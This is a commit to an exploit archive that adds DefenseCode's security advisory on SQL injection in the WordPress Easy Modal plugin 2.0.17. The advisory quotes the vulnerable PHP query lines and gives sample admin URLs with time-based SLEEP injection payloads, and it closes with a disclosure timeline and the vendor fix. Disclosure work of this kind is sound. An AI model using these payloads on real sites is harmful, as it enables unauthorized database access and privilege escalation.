DB: 2017-08-08
1 new exploits WordPress Plugin Easy Modal 2.0.17 - SQL Injection
This commit is contained in:
parent
2aa9bb9ea2
commit
e0bc9883d1
2 changed files with 137 additions and 0 deletions
|
@ -38230,3 +38230,4 @@ id,file,description,date,author,platform,type,port
|
||||||
42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
|
42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
|
||||||
42423,platforms/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps,0
|
42423,platforms/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps,0
|
||||||
42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - SSID Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0
|
42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - SSID Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0
|
||||||
|
42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80
|
||||||
|
|
Can't render this file because it is too large.
|
136
platforms/php/webapps/42431.txt
Executable file
136
platforms/php/webapps/42431.txt
Executable file
|
@ -0,0 +1,136 @@
|
||||||
|
DefenseCode ThunderScan SAST Advisory
|
||||||
|
WordPress Easy Modal Plugin
|
||||||
|
Multiple Security Vulnerabilities
|
||||||
|
|
||||||
|
Advisory ID: DC-2017-01-007
|
||||||
|
Advisory Title: WordPress Easy Modal Plugin Multiple Vulnerabilities
|
||||||
|
Advisory URL: http://www.defensecode.com/advisories.php
|
||||||
|
Software: WordPress Easy Modal plugin
|
||||||
|
Language: PHP
|
||||||
|
Version: 2.0.17 and below
|
||||||
|
Vendor Status: Vendor contacted, update released
|
||||||
|
Release Date: 2017/08/07
|
||||||
|
Risk: Medium
|
||||||
|
|
||||||
|
1. General Overview
|
||||||
|
===================
|
||||||
|
During the security audit of Easy Modal plugin for WordPress CMS,
|
||||||
|
multiple vulnerabilities were discovered using DefenseCode ThunderScan
|
||||||
|
application source code security analysis platform.
|
||||||
|
|
||||||
|
More information about ThunderScan is available at URL:
|
||||||
|
http://www.defensecode.com
|
||||||
|
|
||||||
|
2. Software Overview
|
||||||
|
====================
|
||||||
|
According to the plugin developers, Easy Modal is the #1 WordPress
|
||||||
|
Popup Plugin. It's advertised as "Make glorious & powerful popups and
|
||||||
|
market your content like never before - all in minutes!".
|
||||||
|
|
||||||
|
According to wordpress.org, it has more than 20,000 active installs.
|
||||||
|
|
||||||
|
Homepage:
|
||||||
|
http://wordpress.org/extend/plugins/easy-modal/
|
||||||
|
https://easy-modal.com
|
||||||
|
|
||||||
|
3. Vulnerability Description
|
||||||
|
============================
|
||||||
|
During the security analysis, ThunderScan discovered SQL injection
|
||||||
|
vulnerabilities in Easy Modal WordPress plugin.
|
||||||
|
|
||||||
|
The easiest way to reproduce the vulnerability is to visit the
|
||||||
|
provided URL while being logged in as administrator or another user
|
||||||
|
that is authorized to access the plugin settings page. Users that do
|
||||||
|
not have full administrative privileges could abuse the database
|
||||||
|
access the vulnerability provides to either escalate their privileges
|
||||||
|
or obtain and modify database contents they were not supposed to be
|
||||||
|
able to.
|
||||||
|
|
||||||
|
The nonce token is required as the URL parameter. Token value is not
|
||||||
|
unique for each request, nor per each URL, so if the attacker manages
|
||||||
|
to obtain a valid token value, the module could be exposed to attack
|
||||||
|
vectors such as Cross Site request forgery (CSRF).
|
||||||
|
|
||||||
|
3.1. SQL injection
|
||||||
|
Function: $wpdb->query()
|
||||||
|
Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
|
||||||
|
Sample URL:
|
||||||
|
http://vulnerablesite.com/wp-admin/admin.php?page=easy-modal&action=dele
|
||||||
|
te&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx
|
||||||
|
File: easy-modal\classes\controller\admin\modals.php
|
||||||
|
---------
|
||||||
|
93 $ids = is_array($_GET['id']) ? $_GET['id'] :
|
||||||
|
array($_GET['id']);
|
||||||
|
...
|
||||||
|
97 $ids = $_GET['ids'];
|
||||||
|
...
|
||||||
|
101 $ids = $_GET['modal'];
|
||||||
|
...
|
||||||
|
110 $wpdb->query("UPDATE {$wpdb->prefix}em_modals SET
|
||||||
|
is_trash = 1 WHERE id IN (".implode(',', $ids).")");
|
||||||
|
---------
|
||||||
|
|
||||||
|
3.2. SQL injection
|
||||||
|
Function: $wpdb->query()
|
||||||
|
Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
|
||||||
|
Sample URL:
|
||||||
|
http://vulnerablesite.com/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_ht
|
||||||
|
tp_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-mo
|
||||||
|
dal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AN
|
||||||
|
D%20SLEEP(10)--%20ZpVQ&action2=-1
|
||||||
|
File: easy-modal\classes\controller\admin\modals.php
|
||||||
|
---------
|
||||||
|
123 $ids = is_array($_GET['id']) ? $_GET['id'] :
|
||||||
|
array($_GET['id']);
|
||||||
|
...
|
||||||
|
127 $ids = $_GET['ids'];
|
||||||
|
...
|
||||||
|
131 $ids = $_GET['modal'];
|
||||||
|
...
|
||||||
|
140 $wpdb->query("UPDATE {$wpdb->prefix}em_modals SET
|
||||||
|
is_trash = 0 WHERE id IN ($ids)");
|
||||||
|
---------
|
||||||
|
|
||||||
|
4. Solution
|
||||||
|
===========
|
||||||
|
Vendor resolved the security issues after we reported the
|
||||||
|
vulnerability. All users are strongly advised to update WordPress Easy
|
||||||
|
Modal plugin to the latest available version.
|
||||||
|
|
||||||
|
5. Credits
|
||||||
|
==========
|
||||||
|
Discovered with DefenseCode ThunderScan source code security analyzer
|
||||||
|
by Neven Biruski.
|
||||||
|
|
||||||
|
6. Disclosure Timeline
|
||||||
|
======================
|
||||||
|
2017/04/04 Vendor contacted
|
||||||
|
2017/04/06 Vendor responded
|
||||||
|
2017/04/13 Update released
|
||||||
|
2017/08/07 Advisory released to the public
|
||||||
|
|
||||||
|
7. About DefenseCode
|
||||||
|
====================
|
||||||
|
DefenseCode L.L.C. delivers products and services designed to analyze
|
||||||
|
and test web, desktop and mobile applications for security
|
||||||
|
vulnerabilities.
|
||||||
|
|
||||||
|
DefenseCode ThunderScan is a SAST (Static Application Security
|
||||||
|
Testing, WhiteBox Testing) solution for performing extensive security
|
||||||
|
audits of application source code. ThunderScan SAST performs fast and
|
||||||
|
accurate analyses of large and complex source code projects delivering
|
||||||
|
precise results and low false positive rate.
|
||||||
|
|
||||||
|
DefenseCode WebScanner is a DAST (Dynamic Application Security
|
||||||
|
Testing, BlackBox Testing) solution for comprehensive security audits
|
||||||
|
of active web applications. WebScanner will test a website's security
|
||||||
|
by carrying out a large number of attacks using the most advanced
|
||||||
|
techniques, just as a real attacker would.
|
||||||
|
|
||||||
|
Subscribe for free software trial on our website
|
||||||
|
http://www.defensecode.com/ .
|
||||||
|
|
||||||
|
E-mail: defensecode[at]defensecode.com
|
||||||
|
|
||||||
|
Website: http://www.defensecode.com
|
||||||
|
Twitter: https://twitter.com/DefenseCode/
|
Loading…
Add table
Reference in a new issue